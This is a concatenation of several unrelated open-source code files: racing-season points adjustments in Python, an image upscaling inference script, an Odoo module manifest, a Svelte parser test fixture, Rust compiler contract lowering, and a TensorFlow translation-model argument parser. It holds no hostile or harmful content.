        self.data[idx]["non_droppable"] = True
        return True

    def apply_point_adjustments(self):
        # Apply all stored post-race adjustments exactly once per session.
        if self.already_applied_point_adjustments:
            return
        # iterate through stored adjustments
        count_applied = 0
        for driver_name, adjustment_list in self.point_adjustments.iteritems():
            for adjustment in adjustment_list:
                # for position-based adjustments: move the driver one row at
                # a time; negative/zero positions move the driver up
                if adjustment['type'] == 'adjust_position':
                    positions = adjustment['positions']
                    for i in xrange(abs(positions)):
                        if not self.apply_adjustment_move_driver(driver_name, positions <= 0):
                            break
                # for point-based adjustments
                if adjustment['type'] == 'adjust_points':
                    points = adjustment['points']
                    self.apply_adjustment_assign_points_to_driver(driver_name, points)
                # for non-droppable events
                if adjustment['type'] == 'non_droppable':
                    self.apply_non_droppable(driver_name)
                count_applied += 1
        # if something was applied, we need to reassign positions
        if count_applied > 0:
            self.reassign_positions()
        self.already_applied_point_adjustments = True
def calc_points(self, drivers, season_data):
if not season_data.is_score_points(self.stype):
raise LookupError("Points should be awarded, but can't find them in season configuration")
# add an entry to the dictionary, if it's not there
for entry in self.data:
driver_name, driver_classes = self.get_driver_name_and_classes(entry["driver_name"], season_data)
# determine and store canonical name
entry["driver_name_canonical"] = driver_name
# add an entry to the dictionary, if it's not there
driver = Driver(driver_name)
if not driver in drivers:
drivers[driver] = driver
else:
driver = drivers[driver]
# add discovered classes to the driver
driver.add_classes(driver_classes)
# apply all stored point adjustments
self.apply_point_adjustments()
# process the actual points
for entry in self.data:
# look up driver
driver = drivers[Driver(entry["driver_name_canonical"])]
# determine driver position
position = entry["pos"]
# if points were overwritten as a part of post-race adjustments, then assign this exact value
if "points" in entry:
driver.set_points(self, entry["points"], entry["status"], "non_droppable" in entry)
continue
# assign points based on the status & position
if entry["status"] == 'OK':
# this is a regular finish
points = season_data.get_driver_points(self.stype, position)
entry["points"] = points
driver.set_points(self, points, entry["status"], "non_droppable" in entry)
elif entry["status"] == 'DNS':
# DNS is 'did not start'
# person gets 0 points always. he stays on the rankings, but it creates a gap in points
entry["points"] = 0
driver.set_points(self, 0, entry["status"], "non_droppable" in entry)
elif entry["status"] == 'DNF':
# DNF is 'did not finish'
# we just assign points in order in this case
# i.e. someone who crashed on lap 5 gets less points vs. someone who crashed on lap 6
points = season_data.get_driver_points(self.stype, position)
entry["points"] = points
driver.set_points(self, points, entry["status"], "non_droppable" in entry)
elif entry["status"] == 'DQ':
# DQ - by default it's zero points
# it can be overwritten later by the admin
entry["points"] = 0
driver.set_points(self, 0, entry["status"], "non_droppable" in entry)
else:
# unknown driver status
raise LookupError("Unknown driver status while assigning points: " + str(entry["status"]))
def store_points(self, suffix=""):
# create the directory
dirname = self.config.get_results_directory() + "/" + str(self.round_obj.year) + \
"-round-" + str(self.round_obj.num)
if not os.path.exists(dirname):
os.makedirs(dirname)
# determine the resulting file
fname = dirname + "/" + self.get_name()
if suffix:
fname += "-" + suffix
fname += ".json"
# store the table
print " [x] Saving results to '%s'" % fname
with open(fname, "wb") as json_file:
json.dump(self.data, json_file)
def load_points(self):
# create the directory
dirname = self.config.get_results_directory() + "/" + str(self.round_obj.year) + \
"-round-" + str(self.round_obj.num)
if not os.path.exists(dirname):
os.makedirs(dirname)
# determine the resulting file
fname = dirname + "/" + self.get_name() + ".json"
# store the table
with open(fname, "rb") as json_file:
self.data = json.load(json_file)
def is_approved(self):
session_data_table = self.config.get_db_connection().table('session_data')
results = session_data_table.search(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name())
)
if not results:
return None
return results[0]['approved']
def store_approved_status(self, approved_status):
session_data_table = self.config.get_db_connection().table('session_data')
session_data_table.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name())
)
if approved_status:
session_data_table.insert(
{
'season': self.get_round().year,
'round': self.get_round().num,
'session_name': self.get_name(),
'approved': approved_status
}
)
def load_point_adjustments(self):
session_adjustments = self.config.get_db_connection().table('session_adjustments')
list_of_adjustments = session_adjustments.search(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name())
)
result = {}
for item in list_of_adjustments:
if not item['driver_name'] in result:
result[item['driver_name']] = []
result[item['driver_name']].append(item)
return result
def store_adjustment_of_driver_position(self, driver, positions, reason):
driver_name, driver_classes = self.get_driver_name_and_classes(driver)
session_adjustments = self.config.get_db_connection().table('session_adjustments')
session_adjustments.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name()) &
(where('driver_name') == driver_name) &
(where('type') == 'adjust_position')
)
session_adjustments.insert(
{
'season': self.get_round().year,
'round': self.get_round().num,
'session_name': self.get_name(),
'driver_name': driver_name,
'type': 'adjust_position',
'positions': positions,
'reason': reason
}
)
def store_adjustment_of_driver_points(self, driver, points, reason):
driver_name, driver_classes = self.get_driver_name_and_classes(driver)
session_adjustments = self.config.get_db_connection().table('session_adjustments')
session_adjustments.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name()) &
(where('driver_name') == driver_name) &
(where('type') == 'adjust_points')
)
session_adjustments.insert(
{
'season': self.get_round().year,
'round': self.get_round().num,
'session_name': self.get_name(),
'driver_name': driver_name,
'type': 'adjust_points',
'points': points,
'reason': reason
}
)
def store_non_droppable_event(self, driver, reason):
driver_name, driver_classes = self.get_driver_name_and_classes(driver)
session_adjustments = self.config.get_db_connection().table('session_adjustments')
session_adjustments.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name()) &
(where('driver_name') == driver_name) &
(where('type') == 'non_droppable')
)
session_adjustments.insert(
{
'season': self.get_round().year,
'round': self.get_round().num,
'session_name': self.get_name(),
'driver_name': driver_name,
'type': 'non_droppable',
'reason': reason
}
)
def clear_adjustments_for_driver(self, driver):
driver_name, driver_classes = self.get_driver_name_and_classes(driver)
session_adjustments = self.config.get_db_connection().table('session_adjustments')
session_adjustments.remove(
(where('season') == self.get_round().year) &
(where('round') == self.get_round().num) &
(where('session_name') == self.get_name()) &
(where('driver_name') == driver_name)
) | unknown | codeparrot/codeparrot-clean | ||
from __future__ import print_function
import sys
import cv2
import os
import numpy as np
import cPickle as pickle
import timeit
import time
from argparse import ArgumentParser
import chainer
from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils, Link, Chain, ChainList
import chainer.functions as F
import chainer.links as L
if __name__ == '__main__':
""" Pre setup """
# Get params (Arguments)
parser = ArgumentParser(description='SeRanet inference')
parser.add_argument('input', help='input file path')
parser.add_argument('output', nargs='?', default=None,
help='output file path. If not specified, output image will be saved same location with input file')
parser.add_argument('--gpu', '-g', type=int, default=-1, help='GPU ID (negative value indicates CPU)')
parser.add_argument('--arch', '-a', default='seranet_v1',
help='model selection (basic_cnn_small, '
'seranet_v1)')
parser.add_argument('--color', '-c', default='rgb', help='application scheme for input/output color: (yonly, rgb)')
args = parser.parse_args()
filepath = os.path.dirname(os.path.realpath(__file__))
#DEBUG
#args.input = os.path.join(filepath, '../assets/compare/4/photo4_xinput.jpg')
#args.output = os.path.join(filepath, '../assets/compare/4/seranet_v1.jpg')
input_file_path = args.input
if not os.path.exists(input_file_path):
raise ValueError('input file ', os.path.dirname(input_file_path), ' not exist')
if args.output == None:
file_name_with_ext = os.path.basename(args.input) # returns filename from path
filename_wo_ext, ext = os.path.splitext(file_name_with_ext)
output_file_path = os.path.join(os.path.dirname(args.input), filename_wo_ext + '-seranet.jpg')
conventional_file_path = os.path.join(os.path.dirname(args.input), filename_wo_ext + '-conventional.jpg')
else:
file_name_with_ext = os.path.basename(args.output) # returns filename from path
filename_wo_ext, ext = os.path.splitext(file_name_with_ext)
output_file_path = args.output
conventional_file_path = os.path.join(os.path.dirname(args.output), filename_wo_ext + '-conventional.jpg')
output_file_dir = os.path.dirname(output_file_path)
if not os.path.exists(output_file_dir):
os.mkdir(output_file_dir)
print('output file directory ', output_file_dir, ' not exist, created automatically')
if args.gpu >= 0:
cuda.check_cuda_available()
xp = cuda.cupy if args.gpu >= 0 else np
if args.color == 'yonly':
inout_ch = 1
elif args.color == 'rgb':
inout_ch = 3
else:
raise ValueError('Invalid color training scheme')
# Prepare model
print('prepare model')
if args.arch == 'basic_cnn_tail':
import arch.basic_cnn_tail as model_arch
model = model_arch.basic_cnn_tail(inout_ch=inout_ch)
elif args.arch == 'basic_cnn_middle':
import arch.basic_cnn_middle as model_arch
model = model_arch.basic_cnn_middle(inout_ch=inout_ch)
elif args.arch == 'basic_cnn_head':
import arch.basic_cnn_head as model_arch
model = model_arch.basic_cnn_head(inout_ch=inout_ch)
elif args.arch == 'basic_cnn_small':
import arch.basic_cnn_small as model_arch
model = model_arch.basic_cnn_small(inout_ch=inout_ch)
elif args.arch == 'seranet':
import arch.seranet_split as model_arch
model = model_arch.seranet_split(inout_ch=inout_ch)
elif args.arch == 'seranet_v1':
import arch.seranet_v1 as model_arch
model = model_arch.seranet_v1(inout_ch=inout_ch)
else:
raise ValueError('Invalid architecture name')
arch_folder = model_arch.arch_folder
# Directory/File setting for output
output_folder = os.path.join(arch_folder, args.color, 'output')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
#os.chdir(output_folder)
inference_log_file_name = 'inference.log'
inference_log_file = open(os.path.join(output_folder, inference_log_file_name), 'w')
""" Model setup """
print('setup model')
model_load_path = os.path.join(arch_folder, args.color, 'training_process', 'my.model')
serializers.load_npz(model_load_path, model)
if args.gpu >= 0:
cuda.get_device(args.gpu).use()
model.to_gpu()
model.train = False
""" Load data """
print('loading data')
input_img = cv2.imread(input_file_path, cv2.IMREAD_COLOR)
print('upscaling to ', output_file_path)
if args.color == 'rgb':
input_img = np.transpose(input_img[:, :, :], (2, 0, 1))
input_img = input_img / 255.0 # Must be handled as float
input_img = input_img.reshape((1, input_img.shape[0], input_img.shape[1], input_img.shape[2]))
x_data = model.preprocess_x(input_img)
x = Variable(xp.asarray(x_data), volatile='on')
output_img = model(x)
if (args.gpu >= 0):
output_data = cuda.cupy.asnumpy(output_img.data)
else:
output_data = output_img.data
output_img = output_data[0].transpose(1, 2, 0) * 255.
elif args.color == 'yonly':
ycc_input_img = cv2.cvtColor(input_img, cv2.COLOR_BGR2YCR_CB)
y_input_img = np.transpose(ycc_input_img[:, :, 0:1], (2, 0, 1))
y_input_img = y_input_img / 255.0 # Must be handled as float
y_input_img = y_input_img.reshape((1, y_input_img.shape[0], y_input_img.shape[1], y_input_img.shape[2]))
x_data = model.preprocess_x(y_input_img)
x = Variable(xp.asarray(x_data), volatile='on')
output_y_img = model(x)
if (args.gpu >= 0):
output_y_data = cuda.cupy.asnumpy(output_y_img.data)
else:
output_y_data = output_y_img.data
input_image_height = input_img.shape[0]
input_image_width = input_img.shape[1]
output_image_height = 2 * input_image_height
output_image_width = 2 * input_image_width
scaled_input_img = cv2.resize(input_img, (output_image_width, output_image_height),
interpolation=cv2.INTER_LANCZOS4)
ycc_scaled_input_img = cv2.cvtColor(scaled_input_img, cv2.COLOR_BGR2YCR_CB)
ycc_scaled_input_img[:, :, 0:1] = output_y_data[0].transpose(1, 2, 0) * 255. # (width, height, ch)
output_img = cv2.cvtColor(ycc_scaled_input_img, cv2.COLOR_YCR_CB2BGR)
print('saved to ', output_file_path)
cv2.imwrite(output_file_path, output_img) | unknown | codeparrot/codeparrot-clean | ||
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'CSV Import order wizard',
'version': '0.1',
'category': 'ETL',
'description': '''
Import wizard for import inventory product.
''',
'author': 'Micronaet S.r.l. - Nicola Riolini',
'website': 'http://www.micronaet.it',
'license': 'AGPL-3',
'depends': [
'base',
'product',
'base_log',
'sale',
'purchase',
],
'init_xml': [],
'demo': [],
'data': [
'data/mode_data.xml',
'order_views.xml',
],
'active': False,
'installable': True,
'auto_install': False,
} | unknown | codeparrot/codeparrot-clean | ||
{
"html": {
"type": "Fragment",
"start": 0,
"end": 117,
"children": [
{
"type": "Element",
"start": 0,
"end": 117,
"name": "textarea",
"attributes": [],
"children": [
{
"start": 10,
"end": 50,
"type": "Text",
"raw": "\n\t<p>not actu </textar ally an element. ",
"data": "\n\t<p>not actu </textar ally an element. "
},
{
"type": "MustacheTag",
"start": 50,
"end": 55,
"expression": {
"type": "Identifier",
"start": 51,
"end": 54,
"loc": {
"start": {
"line": 2,
"column": 40
},
"end": {
"line": 2,
"column": 43
}
},
"name": "foo"
}
},
{
"start": 55,
"end": 91,
"type": "Text",
"raw": "</p>\n</textare\n\n\n> </textaread >asdf",
"data": "</p>\n</textare\n\n\n> </textaread >asdf"
}
]
}
]
}
} | json | github | https://github.com/sveltejs/svelte | packages/svelte/tests/parser-legacy/samples/textarea-end-tag/output.json |
use std::sync::Arc;
use thin_vec::thin_vec;
use crate::LoweringContext;
impl<'a, 'hir> LoweringContext<'a, 'hir> {
/// Lowered contracts are guarded with the `contract_checks` compiler flag,
/// i.e. the flag turns into a boolean guard in the lowered HIR. The reason
/// for not eliminating the contract code entirely when the `contract_checks`
/// flag is disabled is so that contracts can be type checked, even when
/// they are disabled, which avoids them becoming stale (i.e. out of sync
/// with the codebase) over time.
///
/// The optimiser should be able to eliminate all contract code guarded
/// by `if false`, leaving the original body intact when runtime contract
/// checks are disabled.
pub(super) fn lower_contract(
&mut self,
body: impl FnOnce(&mut Self) -> rustc_hir::Expr<'hir>,
contract: &rustc_ast::FnContract,
) -> rustc_hir::Expr<'hir> {
// The order in which things are lowered is important! I.e to
// refer to variables in contract_decls from postcond/precond,
// we must lower it first!
let contract_decls = self.lower_decls(contract);
match (&contract.requires, &contract.ensures) {
(Some(req), Some(ens)) => {
// Lower the fn contract, which turns:
//
// { body }
//
// into:
//
// let __postcond = if contract_checks {
// CONTRACT_DECLARATIONS;
// contract_check_requires(PRECOND);
// Some(|ret_val| POSTCOND)
// } else {
// None
// };
// {
// let ret = { body };
//
// if contract_checks {
// contract_check_ensures(__postcond, ret)
// } else {
// ret
// }
// }
let precond = self.lower_precond(req);
let postcond_checker = self.lower_postcond_checker(ens);
let contract_check = self.lower_contract_check_with_postcond(
contract_decls,
Some(precond),
postcond_checker,
);
let wrapped_body =
self.wrap_body_with_contract_check(body, contract_check, postcond_checker.span);
self.expr_block(wrapped_body)
}
(None, Some(ens)) => {
// Lower the fn contract, which turns:
//
// { body }
//
// into:
//
// let __postcond = if contract_checks {
// Some(|ret_val| POSTCOND)
// } else {
// None
// };
// {
// let ret = { body };
//
// if contract_checks {
// CONTRACT_DECLARATIONS;
// contract_check_ensures(__postcond, ret)
// } else {
// ret
// }
// }
let postcond_checker = self.lower_postcond_checker(ens);
let contract_check =
self.lower_contract_check_with_postcond(contract_decls, None, postcond_checker);
let wrapped_body =
self.wrap_body_with_contract_check(body, contract_check, postcond_checker.span);
self.expr_block(wrapped_body)
}
(Some(req), None) => {
// Lower the fn contract, which turns:
//
// { body }
//
// into:
//
// {
// if contracts_checks {
// CONTRACT_DECLARATIONS;
// contract_requires(PRECOND);
// }
// body
// }
let precond = self.lower_precond(req);
let precond_check = self.lower_contract_check_just_precond(contract_decls, precond);
let body = self.arena.alloc(body(self));
// Flatten the body into precond check, then body.
let wrapped_body = self.block_all(
body.span,
self.arena.alloc_from_iter([precond_check].into_iter()),
Some(body),
);
self.expr_block(wrapped_body)
}
(None, None) => body(self),
}
}
fn lower_decls(&mut self, contract: &rustc_ast::FnContract) -> &'hir [rustc_hir::Stmt<'hir>] {
let (decls, decls_tail) = self.lower_stmts(&contract.declarations);
if let Some(e) = decls_tail {
// include the tail expression in the declaration statements
let tail = self.stmt_expr(e.span, *e);
self.arena.alloc_from_iter(decls.into_iter().map(|d| *d).chain([tail].into_iter()))
} else {
decls
}
}
/// Lower the precondition check intrinsic.
fn lower_precond(&mut self, req: &Box<rustc_ast::Expr>) -> rustc_hir::Stmt<'hir> {
let lowered_req = self.lower_expr_mut(&req);
let req_span = self.mark_span_with_reason(
rustc_span::DesugaringKind::Contract,
lowered_req.span,
Some(Arc::clone(&self.allow_contracts)),
);
let precond = self.expr_call_lang_item_fn_mut(
req_span,
rustc_hir::LangItem::ContractCheckRequires,
&*arena_vec![self; lowered_req],
);
self.stmt_expr(req.span, precond)
}
fn lower_postcond_checker(
&mut self,
ens: &Box<rustc_ast::Expr>,
) -> &'hir rustc_hir::Expr<'hir> {
let ens_span = self.lower_span(ens.span);
let ens_span = self.mark_span_with_reason(
rustc_span::DesugaringKind::Contract,
ens_span,
Some(Arc::clone(&self.allow_contracts)),
);
let lowered_ens = self.lower_expr_mut(&ens);
self.expr_call_lang_item_fn(
ens_span,
rustc_hir::LangItem::ContractBuildCheckEnsures,
&*arena_vec![self; lowered_ens],
)
}
fn lower_contract_check_just_precond(
&mut self,
contract_decls: &'hir [rustc_hir::Stmt<'hir>],
precond: rustc_hir::Stmt<'hir>,
) -> rustc_hir::Stmt<'hir> {
let stmts = self
.arena
.alloc_from_iter(contract_decls.into_iter().map(|d| *d).chain([precond].into_iter()));
let then_block_stmts = self.block_all(precond.span, stmts, None);
let then_block = self.arena.alloc(self.expr_block(&then_block_stmts));
let precond_check = rustc_hir::ExprKind::If(
self.arena.alloc(self.expr_bool_literal(precond.span, self.tcx.sess.contract_checks())),
then_block,
None,
);
let precond_check = self.expr(precond.span, precond_check);
self.stmt_expr(precond.span, precond_check)
}
fn lower_contract_check_with_postcond(
&mut self,
contract_decls: &'hir [rustc_hir::Stmt<'hir>],
precond: Option<rustc_hir::Stmt<'hir>>,
postcond_checker: &'hir rustc_hir::Expr<'hir>,
) -> &'hir rustc_hir::Expr<'hir> {
let stmts = self
.arena
.alloc_from_iter(contract_decls.into_iter().map(|d| *d).chain(precond.into_iter()));
let span = match precond {
Some(precond) => precond.span,
None => postcond_checker.span,
};
let postcond_checker = self.arena.alloc(self.expr_enum_variant_lang_item(
postcond_checker.span,
rustc_hir::lang_items::LangItem::OptionSome,
&*arena_vec![self; *postcond_checker],
));
let then_block_stmts = self.block_all(span, stmts, Some(postcond_checker));
let then_block = self.arena.alloc(self.expr_block(&then_block_stmts));
let none_expr = self.arena.alloc(self.expr_enum_variant_lang_item(
postcond_checker.span,
rustc_hir::lang_items::LangItem::OptionNone,
Default::default(),
));
let else_block = self.block_expr(none_expr);
let else_block = self.arena.alloc(self.expr_block(else_block));
let contract_check = rustc_hir::ExprKind::If(
self.arena.alloc(self.expr_bool_literal(span, self.tcx.sess.contract_checks())),
then_block,
Some(else_block),
);
self.arena.alloc(self.expr(span, contract_check))
}
fn wrap_body_with_contract_check(
&mut self,
body: impl FnOnce(&mut Self) -> rustc_hir::Expr<'hir>,
contract_check: &'hir rustc_hir::Expr<'hir>,
postcond_span: rustc_span::Span,
) -> &'hir rustc_hir::Block<'hir> {
let check_ident: rustc_span::Ident =
rustc_span::Ident::from_str_and_span("__ensures_checker", postcond_span);
let (check_hir_id, postcond_decl) = {
// Set up the postcondition `let` statement.
let (checker_pat, check_hir_id) = self.pat_ident_binding_mode_mut(
postcond_span,
check_ident,
rustc_hir::BindingMode::NONE,
);
(
check_hir_id,
self.stmt_let_pat(
None,
postcond_span,
Some(contract_check),
self.arena.alloc(checker_pat),
rustc_hir::LocalSource::Contract,
),
)
};
// Install contract_ensures so we will intercept `return` statements,
// then lower the body.
self.contract_ensures = Some((postcond_span, check_ident, check_hir_id));
let body = self.arena.alloc(body(self));
// Finally, inject an ensures check on the implicit return of the body.
let body = self.inject_ensures_check(body, postcond_span, check_ident, check_hir_id);
// Flatten the body into precond, then postcond, then wrapped body.
let wrapped_body = self.block_all(
body.span,
self.arena.alloc_from_iter([postcond_decl].into_iter()),
Some(body),
);
wrapped_body
}
/// Create an `ExprKind::Ret` that is optionally wrapped by a call to check
/// a contract ensures clause, if it exists.
pub(super) fn checked_return(
&mut self,
opt_expr: Option<&'hir rustc_hir::Expr<'hir>>,
) -> rustc_hir::ExprKind<'hir> {
let checked_ret =
if let Some((check_span, check_ident, check_hir_id)) = self.contract_ensures {
let expr = opt_expr.unwrap_or_else(|| self.expr_unit(check_span));
Some(self.inject_ensures_check(expr, check_span, check_ident, check_hir_id))
} else {
opt_expr
};
rustc_hir::ExprKind::Ret(checked_ret)
}
/// Wraps an expression with a call to the ensures check before it gets returned.
pub(super) fn inject_ensures_check(
&mut self,
expr: &'hir rustc_hir::Expr<'hir>,
span: rustc_span::Span,
cond_ident: rustc_span::Ident,
cond_hir_id: rustc_hir::HirId,
) -> &'hir rustc_hir::Expr<'hir> {
// {
// let ret = { body };
//
// if contract_checks {
// contract_check_ensures(__postcond, ret)
// } else {
// ret
// }
// }
let ret_ident: rustc_span::Ident = rustc_span::Ident::from_str_and_span("__ret", span);
// Set up the return `let` statement.
let (ret_pat, ret_hir_id) =
self.pat_ident_binding_mode_mut(span, ret_ident, rustc_hir::BindingMode::NONE);
let ret_stmt = self.stmt_let_pat(
None,
span,
Some(expr),
self.arena.alloc(ret_pat),
rustc_hir::LocalSource::Contract,
);
let ret = self.expr_ident(span, ret_ident, ret_hir_id);
let cond_fn = self.expr_ident(span, cond_ident, cond_hir_id);
let contract_check = self.expr_call_lang_item_fn_mut(
span,
rustc_hir::LangItem::ContractCheckEnsures,
arena_vec![self; *cond_fn, *ret],
);
let contract_check = self.arena.alloc(contract_check);
let call_expr = self.block_expr_block(contract_check);
// same ident can't be used in 2 places, so we create a new one for the
// else branch
let ret = self.expr_ident(span, ret_ident, ret_hir_id);
let ret_block = self.block_expr_block(ret);
let contracts_enabled: rustc_hir::Expr<'_> =
self.expr_bool_literal(span, self.tcx.sess.contract_checks());
let contract_check = self.arena.alloc(self.expr(
span,
rustc_hir::ExprKind::If(
self.arena.alloc(contracts_enabled),
call_expr,
Some(ret_block),
),
));
let attrs: rustc_ast::AttrVec = thin_vec![self.unreachable_code_attr(span)];
self.lower_attrs(contract_check.hir_id, &attrs, span, rustc_hir::Target::Expression);
let ret_block = self.block_all(span, arena_vec![self; ret_stmt], Some(contract_check));
self.arena.alloc(self.expr_block(self.arena.alloc(ret_block)))
}
} | rust | github | https://github.com/rust-lang/rust | compiler/rustc_ast_lowering/src/contract.rs |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow NMT model implementation."""
from __future__ import print_function
import argparse
import os
import random
import sys
import numpy as np
from px.nmt import inference
from px.nmt import train_combined as train
from px.nmt.utils import vocab_utils
import tensorflow as tf
from third_party.nmt.utils import evaluation_utils
from third_party.nmt.utils import misc_utils as utils
utils.check_tensorflow_version()
FLAGS = None
def add_arguments(parser):
"""Build ArgumentParser."""
parser.register("type", "bool", lambda v: v.lower() == "true")
# network
parser.add_argument("--num_units", type=int, default=32, help="Network size.")
parser.add_argument(
"--num_layers", type=int, default=2, help="Network depth.")
parser.add_argument(
"--num_encoder_layers",
type=int,
default=None,
help="Encoder depth, equal to num_layers if None.")
parser.add_argument(
"--num_decoder_layers",
type=int,
default=None,
help="Decoder depth, equal to num_layers if None.")
parser.add_argument(
"--encoder_type",
type=str,
default="uni",
help="""\
uni | bi | gnmt.
For bi, we build num_encoder_layers/2 bi-directional layers.
For gnmt, we build 1 bi-directional layer, and (num_encoder_layers - 1)
uni-directional layers.\
""")
parser.add_argument(
"--residual",
type="bool",
nargs="?",
const=True,
default=False,
help="Whether to add residual connections.")
parser.add_argument(
"--num_embeddings_partitions",
type=int,
default=2,
help="Number of partitions for embedding vars.")
# attention mechanisms
parser.add_argument(
"--attention",
type=str,
default="",
help="""\
luong | scaled_luong | bahdanau | normed_bahdanau or set to "" for no
attention\
""")
parser.add_argument(
"--attention_architecture",
type=str,
default="standard",
help="""\
standard | gnmt | gnmt_v2.
standard: use top layer to compute attention.
gnmt: GNMT style of computing attention, use previous bottom layer to
compute attention.
gnmt_v2: similar to gnmt, but use current bottom layer to compute
attention.\
""")
parser.add_argument(
"--output_attention",
type="bool",
nargs="?",
const=True,
default=True,
help="""\
Only used in standard attention_architecture. Whether use attention as
the cell output at each timestep.
.\
""")
parser.add_argument(
"--pass_hidden_state",
type="bool",
nargs="?",
const=True,
default=True,
help="""\
Whether to pass encoder's hidden state to decoder when using an attention
based model.\
""")
# optimizer
parser.add_argument(
"--optimizer",
type=str,
default="sgd",
help="sgd | adam | rmsprop | adadelta")
parser.add_argument(
"--learning_rate",
type=float,
default=1.0,
help="Learning rate. Adam: 0.001 | 0.0001")
parser.add_argument(
"--warmup_steps",
type=int,
default=0,
help="How many steps we inverse-decay learning.")
parser.add_argument(
"--warmup_scheme",
type=str,
default="t2t",
help="""\
How to warmup learning rates. Options include:
t2t: Tensor2Tensor's way, start with lr 100 times smaller, then
exponentiate until the specified lr.\
""")
parser.add_argument(
"--decay_scheme",
type=str,
default="",
help="""\
How we decay learning rate. Options include:
luong234: after 2/3 num train steps, we start halving the learning rate
for 4 times before finishing.
luong10: after 1/2 num train steps, we start halving the learning rate
for 10 times before finishing.\
""")
parser.add_argument(
"--num_train_steps", type=int, default=12000, help="Num steps to train.")
parser.add_argument(
"--colocate_gradients_with_ops",
type="bool",
nargs="?",
const=True,
default=True,
help=("Whether try colocating gradients with "
"corresponding op"))
# initializer
parser.add_argument(
"--init_op",
type=str,
default="uniform",
help="uniform | glorot_normal | glorot_uniform")
parser.add_argument(
"--init_weight",
type=float,
default=0.1,
help=("for uniform init_op, initialize weights "
"between [-this, this]."))
# data
parser.add_argument(
"--src", type=str, default=None, help="Source suffix, e.g., en.")
parser.add_argument(
"--tgt", type=str, default=None, help="Target suffix, e.g., de.")
parser.add_argument(
"--ctx", type=str, default=None, help="Source context suffix, e.g., ctx.")
parser.add_argument(
"--train_prefix",
type=str,
default=None,
help="Train prefix, expect files with src/tgt suffixes.")
parser.add_argument(
"--dev_prefix",
type=str,
default=None,
help="Dev prefix, expect files with src/tgt suffixes.")
parser.add_argument(
"--test_prefix",
type=str,
default=None,
help="Test prefix, expect files with src/tgt suffixes.")
parser.add_argument(
"--train_annotations",
type=str,
default=None,
help="Train annotations file.")
parser.add_argument(
"--dev_annotations", type=str, default=None, help="Dev annotations file.")
parser.add_argument(
"--test_annotations",
type=str,
default=None,
help="Test annotations file.")
parser.add_argument(
"--out_dir", type=str, default=None, help="Store log/model files.")
# Vocab
parser.add_argument(
"--vocab_prefix",
type=str,
default=None,
help="""\
Vocab prefix, expect files with src/tgt suffixes.\
""")
parser.add_argument(
"--embed_prefix",
type=str,
default=None,
help="""\
Pretrained embedding prefix, expect files with src/tgt suffixes.
The embedding files should be Glove formatted txt files.\
""")
parser.add_argument(
"--sos", type=str, default="<s>", help="Start-of-sentence symbol.")
parser.add_argument(
"--eos", type=str, default="</s>", help="End-of-sentence symbol.")
parser.add_argument(
"--share_vocab",
type="bool",
nargs="?",
const=True,
default=False,
help="""\
Whether to use the source vocab and embeddings for both source and
target.\
""")
parser.add_argument(
"--check_special_token",
type="bool",
default=True,
help="""\
Whether check special sos, eos, unk tokens exist in the
vocab files.\
""")
# Sequence lengths
parser.add_argument(
"--src_max_len",
type=int,
default=50,
help="Max length of src sequences during training.")
parser.add_argument(
"--tgt_max_len",
type=int,
default=50,
help="Max length of tgt sequences during training.")
parser.add_argument(
"--src_max_len_infer",
type=int,
default=None,
help="Max length of src sequences during inference.")
parser.add_argument(
"--tgt_max_len_infer",
type=int,
default=None,
help="""\
Max length of tgt sequences during inference. Also use to restrict the
maximum decoding length.\
""")
# Context
parser.add_argument(
"--context_vector",
type=str,
default="",
help="""\
Method to produce context vector
append | bilstm_pool | bilstm_last or set to "" if there is no context
append: do string append of context and source. context_feed must be set
to append. Delimiter is defined with --context_delimiter.
bilstm_full: encode context with bi-LSTM, then send all encoder outputs.
only works with context_feed = encoder_output
bilstm_pool: encode context with bi-LSTM, then maxpool over the top layer.
bilstm_last: encode context with bi-LSTM,
then use top layer's last output.
cnn: Do a 4 layers CNN
last_state: Send the LSTM hidden state to the decoder initial state.
only works with context_feed = decoder_hidden_state
\
""")
parser.add_argument(
"--context_feed",
type=str,
default="",
help="""\
Method to feed the context into the model
append | encoder_output | decoder_hidden_state
or set to "" if there is no context
append: do string append of context and source. contex vector must be set
to append. Delimiter is defined with --context_delimiter.
encoder_output : concat the context vector to the source encoder output.
decoder_hidden_state : pass the context vector to
the decoder initial hidden state.
\
""")
parser.add_argument(
"--context_delimiter",
type=str,
default="<ctx>",
help="A delimiter when appending context and source.")
# Default settings works well (rarely need to change)
parser.add_argument(
"--unit_type",
type=str,
default="lstm",
help="lstm | gru | layer_norm_lstm | nas")
parser.add_argument(
"--forget_bias",
type=float,
default=1.0,
help="Forget bias for BasicLSTMCell.")
parser.add_argument(
"--dropout", type=float, default=0.2, help="Dropout rate (not keep_prob)")
parser.add_argument(
"--max_gradient_norm",
type=float,
default=5.0,
help="Clip gradients to this norm.")
parser.add_argument(
"--source_reverse",
type="bool",
nargs="?",
const=True,
default=False,
help="Reverse source sequence.")
